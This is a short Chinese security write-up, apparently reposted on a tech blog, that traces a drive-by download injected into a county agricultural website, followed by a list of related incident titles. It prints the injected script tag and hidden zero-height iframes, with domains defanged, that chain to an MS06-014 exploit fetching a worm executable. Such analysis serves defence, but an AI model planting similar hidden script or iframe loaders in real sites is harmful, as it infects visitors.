某县农业信息网挂马 Worm.Win32.AutoRun.umf

简介: 某县农业信息网挂马 Worm.Win32.AutoRun.umf

某县农业信息网挂马 Worm.Win32.AutoRun.umf

 

网站首页包含代码:

/---
<script src=hxxp://w**.9*4sa**om*m*.com/js.js></script>
---/

#1 hxxp://w**.9*4sa**om*m*.com/js.js

输出代码:

/---
<iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0></iframe>
---/

 

#1.1 hxxp://w**.c**6*6f**.cn/swf.htm

检测浏览器类型,如果是IE内核,则此显示ie.swf,否则显示ff.swf,并输出代码:

/---
<iframe src=x.htm width=60 height=0></iframe>
---/

 

#1.1.1 hxxp://w**.c**6*6f**.cn/ie.swf

 

#1.1.2 hxxp://w**.c**6*6f**.cn/ff.swf

 

#1.1.3 hxxp://w**.c**6*6f**.cn/x.htm

引入以下网页:

 

#1.1.3.1 hxxp://w**.c**6*6f**.cn/1.htm

利用ms-06014漏洞下载 hxxp://d**.w**uc**7*.com/xx.exe


相关文章
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
安全
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
|
2月前
|
安全 JavaScript 前端开发
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
|
2月前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
|
2月前
|
开发框架 安全 .NET
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
|
2月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
|
2月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
|
2月前
|
监控
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
|
2月前
|
移动开发 监控 安全
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
|
2月前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
下一篇
无影云桌面